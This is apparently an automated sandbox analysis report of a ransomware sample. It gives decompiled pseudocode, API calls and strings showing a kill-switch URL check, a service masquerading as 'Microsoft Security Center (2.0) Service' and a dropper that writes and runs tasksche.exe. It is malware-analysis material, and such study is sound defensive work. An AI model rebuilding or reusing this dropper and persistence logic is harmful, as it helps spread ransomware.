                                                            													}
                                                            												}
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return 0;
                                                            			}






















                                                            0x00407cf5
                                                            0x00407cfb
                                                            0x00407d15
                                                            0x00407d22
                                                            0x00407d2f
                                                            0x00407d34
                                                            0x00407d3c
                                                            0x00407d43
                                                            0x00407d49
                                                            0x00407d4f
                                                            0x00407d55
                                                            0x00407d5b
                                                            0x00407d7a
                                                            0x00407d7e
                                                            0x00407d86
                                                            0x00407d8e
                                                            0x00407d95
                                                            0x00407d9d
                                                            0x00407da1
                                                            0x00407daf
                                                            0x00407db3
                                                            0x00407dc4
                                                            0x00407dc8
                                                            0x00407dca
                                                            0x00407dcc
                                                            0x00407ddb
                                                            0x00407de2
                                                            0x00407def
                                                            0x00407df1
                                                            0x00407e01
                                                            0x00407e18
                                                            0x00407e2c
                                                            0x00407e43
                                                            0x00407e49
                                                            0x00407e4e
                                                            0x00407e61
                                                            0x00407e68
                                                            0x00407e72
                                                            0x00407e7a
                                                            0x00407e82
                                                            0x00407e8b
                                                            0x00407e95
                                                            0x00407e9b
                                                            0x00407e9f
                                                            0x00407ea8
                                                            0x00407eb0
                                                            0x00407ebc
                                                            0x00407ed3
                                                            0x00407edb
                                                            0x00407ee0
                                                            0x00407ee8
                                                            0x00407ef0
                                                            0x00407ef7
                                                            0x00407f02
                                                            0x00407f02
                                                            0x00407ef0
                                                            0x00407e4e
                                                            0x00407db3
                                                            0x00407da1
                                                            0x00407d8e
                                                            0x00407d7e
                                                            0x00407d5b
                                                            0x00407d4f
                                                            0x00407d43
                                                            0x00407f14

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F56FB10,?,00000000), ref: 00407CEF
                                                            • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                                                            • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                                                            • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                                                            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                                                            • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                                                            • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                                                            • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                                                            • sprintf.MSVCRT ref: 00407E01
                                                            • sprintf.MSVCRT ref: 00407E18
                                                            • MoveFileExA.KERNEL32 ref: 00407E2C
                                                            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                                                            • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
                                                            • CreateProcessA.KERNELBASE ref: 00407EE8
                                                            • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                                                            • CloseHandle.KERNEL32(08000000), ref: 00407F02
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.358655198.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.358609778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358672232.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358678367.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358741001.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
                                                            • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                                                            • API String ID: 1541710770-1507730452
                                                            • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                            • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                                                            • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                            • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                            				CHAR* _v8;
                                                            				intOrPtr* _v24;
                                                            				intOrPtr _v28;
                                                            				struct _STARTUPINFOA _v96;
                                                            				int _v100;
                                                            				char** _v104;
                                                            				int _v108;
                                                            				void _v112;
                                                            				char** _v116;
                                                            				intOrPtr* _v120;
                                                            				intOrPtr _v124;
                                                            				void* _t27;
                                                            				intOrPtr _t36;
                                                            				signed int _t38;
                                                            				int _t40;
                                                            				intOrPtr* _t41;
                                                            				intOrPtr _t42;
                                                            				intOrPtr _t49;
                                                            				intOrPtr* _t55;
                                                            				intOrPtr _t58;
                                                            				intOrPtr _t61;
                                                            
                                                            				_push(0xffffffff);
                                                            				_push(0x40a1a0);
                                                            				_push(0x409ba2);
                                                            				_push( *[fs:0x0]);
                                                            				 *[fs:0x0] = _t58;
                                                            				_v28 = _t58 - 0x68;
                                                            				_v8 = 0;
                                                            				__set_app_type(2);
                                                            				 *0x70f894 =  *0x70f894 | 0xffffffff;
                                                            				 *0x70f898 =  *0x70f898 | 0xffffffff;
                                                            				 *(__p__fmode()) =  *0x70f88c;
                                                            				 *(__p__commode()) =  *0x70f888;
                                                            				 *0x70f890 = _adjust_fdiv;
                                                            				_t27 = E00409BA1( *_adjust_fdiv);
                                                            				_t61 =  *0x431410; // 0x1
                                                            				if(_t61 == 0) {
                                                            					__setusermatherr(E00409B9E);
                                                            				}
                                                            				E00409B8C(_t27);
                                                            				_push(0x40b010);
                                                            				_push(0x40b00c);
                                                            				L00409B86();
                                                            				_v112 =  *0x70f884;
                                                            				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                                                            				_push(0x40b008);
                                                            				_push(0x40b000); // executed
                                                            				L00409B86(); // executed
                                                            				_t55 =  *_acmdln;
                                                            				_v120 = _t55;
                                                            				if( *_t55 != 0x22) {
                                                            					while( *_t55 > 0x20) {
                                                            						_t55 = _t55 + 1;
                                                            						_v120 = _t55;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t55 = _t55 + 1;
                                                            						_v120 = _t55;
                                                            						_t42 =  *_t55;
                                                            					} while (_t42 != 0 && _t42 != 0x22);
                                                            					if( *_t55 == 0x22) {
                                                            						L6:
                                                            						_t55 = _t55 + 1;
                                                            						_v120 = _t55;
                                                            					}
                                                            				}
                                                            				_t36 =  *_t55;
                                                            				if(_t36 != 0 && _t36 <= 0x20) {
                                                            					goto L6;
                                                            				}
                                                            				_v96.dwFlags = 0;
                                                            				GetStartupInfoA( &_v96);
                                                            				if((_v96.dwFlags & 0x00000001) == 0) {
                                                            					_t38 = 0xa;
                                                            				} else {
                                                            					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                            				}
                                                            				_push(_t38);
                                                            				_push(_t55);
                                                            				_push(0);
                                                            				_push(GetModuleHandleA(0));
                                                            				_t40 = E00408140();
                                                            				_v108 = _t40;
                                                            				exit(_t40); // executed
                                                            				_t41 = _v24;
                                                            				_t49 =  *((intOrPtr*)( *_t41));
                                                            				_v124 = _t49;
                                                            				_push(_t41);
                                                            				_push(_t49);
                                                            				L00409B80();
                                                            				return _t41;
                                                            			}
























                                                            0x00409a19
                                                            0x00409a1b
                                                            0x00409a20
                                                            0x00409a2b
                                                            0x00409a2c
                                                            0x00409a39
                                                            0x00409a3e
                                                            0x00409a43
                                                            0x00409a4a
                                                            0x00409a51
                                                            0x00409a64
                                                            0x00409a72
                                                            0x00409a7b
                                                            0x00409a80
                                                            0x00409a85
                                                            0x00409a8b
                                                            0x00409a92
                                                            0x00409a98
                                                            0x00409a99
                                                            0x00409a9e
                                                            0x00409aa3
                                                            0x00409aa8
                                                            0x00409ab2
                                                            0x00409acb
                                                            0x00409ad1
                                                            0x00409ad6
                                                            0x00409adb
                                                            0x00409ae8
                                                            0x00409aea
                                                            0x00409af0
                                                            0x00409b2c
                                                            0x00409b31
                                                            0x00409b32
                                                            0x00409b32
                                                            0x00409af2
                                                            0x00409af2
                                                            0x00409af2
                                                            0x00409af3
                                                            0x00409af6
                                                            0x00409af8
                                                            0x00409b03
                                                            0x00409b05
                                                            0x00409b05
                                                            0x00409b06
                                                            0x00409b06
                                                            0x00409b03
                                                            0x00409b09
                                                            0x00409b0d
                                                            0x00000000
                                                            0x00000000
                                                            0x00409b13
                                                            0x00409b1a
                                                            0x00409b24
                                                            0x00409b39
                                                            0x00409b26
                                                            0x00409b26
                                                            0x00409b26
                                                            0x00409b3a
                                                            0x00409b3b
                                                            0x00409b3c
                                                            0x00409b44
                                                            0x00409b45
                                                            0x00409b4a
                                                            0x00409b4e
                                                            0x00409b54
                                                            0x00409b59
                                                            0x00409b5b
                                                            0x00409b5e
                                                            0x00409b5f
                                                            0x00409b60
                                                            0x00409b67

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.358655198.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.358609778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358672232.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358678367.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358741001.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                            • String ID:
                                                            • API String ID: 801014965-0
                                                            • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                            • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                                                            • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                            • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E00408140() {
                                                            				char* _v1;
                                                            				char* _v3;
                                                            				char* _v7;
                                                            				char* _v11;
                                                            				char* _v15;
                                                            				char* _v19;
                                                            				char* _v23;
                                                            				void _v80;
                                                            				char _v100;
                                                            				char* _t12;
                                                            				void* _t13;
                                                            				void* _t27;
                                                            
                                                            				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
                                                            				asm("movsb");
                                                            				_v23 = _t12;
                                                            				_v19 = _t12;
                                                            				_v15 = _t12;
                                                            				_v11 = _t12;
                                                            				_v7 = _t12;
                                                            				_v3 = _t12;
                                                            				_v1 = _t12;
                                                            				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
                                                            				_t27 = _t13;
                                                            				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
                                                            				_push(_t27);
                                                            				InternetCloseHandle(); // executed
                                                            				InternetCloseHandle(0);
                                                            				E00408090();
                                                            				return 0;
                                                            			}















                                                            0x00408155
                                                            0x00408157
                                                            0x00408158
                                                            0x0040815c
                                                            0x00408160
                                                            0x00408164
                                                            0x00408168
                                                            0x0040816c
                                                            0x00408177
                                                            0x0040817b
                                                            0x0040818e
                                                            0x00408194
                                                            0x0040819c
                                                            0x004081a7
                                                            0x004081ab
                                                            0x004081ad
                                                            0x004081b9

                                                            APIs
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                                                            • InternetCloseHandle.WININET(00000000), ref: 004081A7
                                                            • InternetCloseHandle.WININET(00000000), ref: 004081AB
                                                              • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                              • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                                                            Strings
                                                            • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.358655198.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.358609778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358672232.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358678367.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358741001.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                                                            • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                            • API String ID: 774561529-2942426231
                                                            • Opcode ID: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                                                            • Instruction ID: 3b8a91e0baa4f3639afdb349cfc438007093f0a6557163af6b5eb03d237fc32a
                                                            • Opcode Fuzzy Hash: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                                                            • Instruction Fuzzy Hash: B3018671548310AEE310DF748D01B6B7BE9EF85710F01082EF984F72C0EAB59804876B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00407C40() {
                                                            				char _v260;
                                                            				void* _t15;
                                                            				void* _t17;
                                                            
                                                            				sprintf( &_v260, "%s -m security", 0x70f760);
                                                            				_t15 = OpenSCManagerA(0, 0, 0xf003f);
                                                            				if(_t15 == 0) {
                                                            					return 0;
                                                            				} else {
                                                            					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
                                                            					if(_t17 != 0) {
                                                            						StartServiceA(_t17, 0, 0);
                                                            						CloseServiceHandle(_t17);
                                                            					}
                                                            					CloseServiceHandle(_t15);
                                                            					return 0;
                                                            				}
                                                            			}






                                                            0x00407c56
                                                            0x00407c6e
                                                            0x00407c72
                                                            0x00407cd3
                                                            0x00407c74
                                                            0x00407ca7
                                                            0x00407cab
                                                            0x00407cb2
                                                            0x00407cb9
                                                            0x00407cb9
                                                            0x00407cbc
                                                            0x00407cc9
                                                            0x00407cc9

                                                            APIs
                                                            • sprintf.MSVCRT ref: 00407C56
                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                                                            • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F56FB10,00000000), ref: 00407C9B
                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.358655198.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.358609778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358672232.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358678367.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358741001.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                                                            • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                                                            • API String ID: 3340711343-4063779371
                                                            • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                            • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                                                            • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                            • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E00408090() {
                                                            				char* _v4;
                                                            				char* _v8;
                                                            				intOrPtr _v12;
                                                            				struct _SERVICE_TABLE_ENTRY _v16;
                                                            				long _t6;
                                                            				void* _t19;
                                                            				void* _t22;
                                                            
                                                            				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
                                                            				__imp____p___argc();
                                                            				_t26 =  *_t6 - 2;
                                                            				if( *_t6 >= 2) {
                                                            					_t19 = OpenSCManagerA(0, 0, 0xf003f);
                                                            					__eflags = _t19;
                                                            					if(_t19 != 0) {
                                                            						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
                                                            						__eflags = _t22;
                                                            						if(_t22 != 0) {
                                                            							E00407FA0(_t22, 0x3c);
                                                            							CloseServiceHandle(_t22);
                                                            						}
                                                            						CloseServiceHandle(_t19);
                                                            					}
                                                            					_v16 = "mssecsvc2.0";
                                                            					_v12 = 0x408000;
                                                            					_v8 = 0;
                                                            					_v4 = 0;
                                                            					return StartServiceCtrlDispatcherA( &_v16);
                                                            				} else {
                                                            					return E00407F20(_t26);
                                                            				}
                                                            			}










                                                            0x0040809f
                                                            0x004080a5
                                                            0x004080ab
                                                            0x004080ae
                                                            0x004080c9
                                                            0x004080cb
                                                            0x004080cd
                                                            0x004080e8
                                                            0x004080ea
                                                            0x004080ec
                                                            0x004080f1
                                                            0x004080fa
                                                            0x004080fa
                                                            0x004080fd
                                                            0x00408100
                                                            0x00408105
                                                            0x0040810e
                                                            0x00408116
                                                            0x0040811e
                                                            0x00408130
                                                            0x004080b0
                                                            0x004080b8
                                                            0x004080b8

                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                            • __p___argc.MSVCRT ref: 004080A5
                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                                                            • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F56FB10,00000000,?,004081B2), ref: 004080DC
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.358655198.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.358609778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358672232.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358678367.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358741001.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                                                            • String ID: mssecsvc2.0
                                                            • API String ID: 4274534310-3729025388
                                                            • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                            • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                                                            • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                            • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E00408090() {
                                                            				char* _v4;
                                                            				char* _v8;
                                                            				intOrPtr _v12;
                                                            				struct _SERVICE_TABLE_ENTRY _v16;
                                                            				long _t6;
                                                            				int _t9;
                                                            				void* _t19;
                                                            				void* _t22;
                                                            
                                                            				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
                                                            				__imp____p___argc();
                                                            				_t26 =  *_t6 - 2;
                                                            				if( *_t6 >= 2) {
                                                            					_t19 = OpenSCManagerA(0, 0, 0xf003f);
                                                            					__eflags = _t19;
                                                            					if(_t19 != 0) {
                                                            						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
                                                            						__eflags = _t22;
                                                            						if(_t22 != 0) {
                                                            							E00407FA0(_t22, 0x3c);
                                                            							CloseServiceHandle(_t22);
                                                            						}
                                                            						CloseServiceHandle(_t19);
                                                            					}
                                                            					_v16 = "mssecsvc2.0";
                                                            					_v12 = 0x408000;
                                                            					_v8 = 0;
                                                            					_v4 = 0;
                                                            					_t9 = StartServiceCtrlDispatcherA( &_v16); // executed
                                                            					return _t9;
                                                            				} else {
                                                            					return E00407F20(_t26);
                                                            				}
                                                            			}











                                                            0x0040809f
                                                            0x004080a5
                                                            0x004080ab
                                                            0x004080ae
                                                            0x004080c9
                                                            0x004080cb
                                                            0x004080cd
                                                            0x004080e8
                                                            0x004080ea
                                                            0x004080ec
                                                            0x004080f1
                                                            0x004080fa
                                                            0x004080fa
                                                            0x004080fd
                                                            0x00408100
                                                            0x00408105
                                                            0x0040810e
                                                            0x00408116
                                                            0x0040811e
                                                            0x00408126
                                                            0x00408130
                                                            0x004080b0
                                                            0x004080b8
                                                            0x004080b8

                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                            • __p___argc.MSVCRT ref: 004080A5
                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                                                            • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F56FB10,00000000,?,004081B2), ref: 004080DC
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.618228627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.618224048.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618237533.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618245521.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618245521.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618279506.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618284781.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                                                            • String ID: mssecsvc2.0
                                                            • API String ID: 4274534310-3729025388
                                                            • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                            • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                                                            • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                            • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                            				CHAR* _v8;
                                                            				intOrPtr* _v24;
                                                            				intOrPtr _v28;
                                                            				struct _STARTUPINFOA _v96;
                                                            				int _v100;
                                                            				char** _v104;
                                                            				int _v108;
                                                            				void _v112;
                                                            				char** _v116;
                                                            				intOrPtr* _v120;
                                                            				intOrPtr _v124;
                                                            				void* _t27;
                                                            				intOrPtr _t36;
                                                            				signed int _t38;
                                                            				int _t40;
                                                            				intOrPtr* _t41;
                                                            				intOrPtr _t42;
                                                            				intOrPtr _t49;
                                                            				intOrPtr* _t55;
                                                            				intOrPtr _t58;
                                                            				intOrPtr _t61;
                                                            
                                                            				_push(0xffffffff);
                                                            				_push(0x40a1a0);
                                                            				_push(0x409ba2);
                                                            				_push( *[fs:0x0]);
                                                            				 *[fs:0x0] = _t58;
                                                            				_v28 = _t58 - 0x68;
                                                            				_v8 = 0;
                                                            				__set_app_type(2);
                                                            				 *0x70f894 =  *0x70f894 | 0xffffffff;
                                                            				 *0x70f898 =  *0x70f898 | 0xffffffff;
                                                            				 *(__p__fmode()) =  *0x70f88c;
                                                            				 *(__p__commode()) =  *0x70f888;
                                                            				 *0x70f890 = _adjust_fdiv;
                                                            				_t27 = E00409BA1( *_adjust_fdiv);
                                                            				_t61 =  *0x431410; // 0x1
                                                            				if(_t61 == 0) {
                                                            					__setusermatherr(E00409B9E);
                                                            				}
                                                            				E00409B8C(_t27);
                                                            				_push(0x40b010);
                                                            				_push(0x40b00c);
                                                            				L00409B86();
                                                            				_v112 =  *0x70f884;
                                                            				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                                                            				_push(0x40b008);
                                                            				_push(0x40b000); // executed
                                                            				L00409B86(); // executed
                                                            				_t55 =  *_acmdln;
                                                            				_v120 = _t55;
                                                            				if( *_t55 != 0x22) {
                                                            					while( *_t55 > 0x20) {
                                                            						_t55 = _t55 + 1;
                                                            						_v120 = _t55;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t55 = _t55 + 1;
                                                            						_v120 = _t55;
                                                            						_t42 =  *_t55;
                                                            					} while (_t42 != 0 && _t42 != 0x22);
                                                            					if( *_t55 == 0x22) {
                                                            						L6:
                                                            						_t55 = _t55 + 1;
                                                            						_v120 = _t55;
                                                            					}
                                                            				}
                                                            				_t36 =  *_t55;
                                                            				if(_t36 != 0 && _t36 <= 0x20) {
                                                            					goto L6;
                                                            				}
                                                            				_v96.dwFlags = 0;
                                                            				GetStartupInfoA( &_v96);
                                                            				if((_v96.dwFlags & 0x00000001) == 0) {
                                                            					_t38 = 0xa;
                                                            				} else {
                                                            					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                            				}
                                                            				_push(_t38);
                                                            				_push(_t55);
                                                            				_push(0);
                                                            				_push(GetModuleHandleA(0));
                                                            				_t40 = E00408140();
                                                            				_v108 = _t40;
                                                            				exit(_t40);
                                                            				_t41 = _v24;
                                                            				_t49 =  *((intOrPtr*)( *_t41));
                                                            				_v124 = _t49;
                                                            				_push(_t41);
                                                            				_push(_t49);
                                                            				L00409B80();
                                                            				return _t41;
                                                            			}
























                                                            0x00409a19
                                                            0x00409a1b
                                                            0x00409a20
                                                            0x00409a2b
                                                            0x00409a2c
                                                            0x00409a39
                                                            0x00409a3e
                                                            0x00409a43
                                                            0x00409a4a
                                                            0x00409a51
                                                            0x00409a64
                                                            0x00409a72
                                                            0x00409a7b
                                                            0x00409a80
                                                            0x00409a85
                                                            0x00409a8b
                                                            0x00409a92
                                                            0x00409a98
                                                            0x00409a99
                                                            0x00409a9e
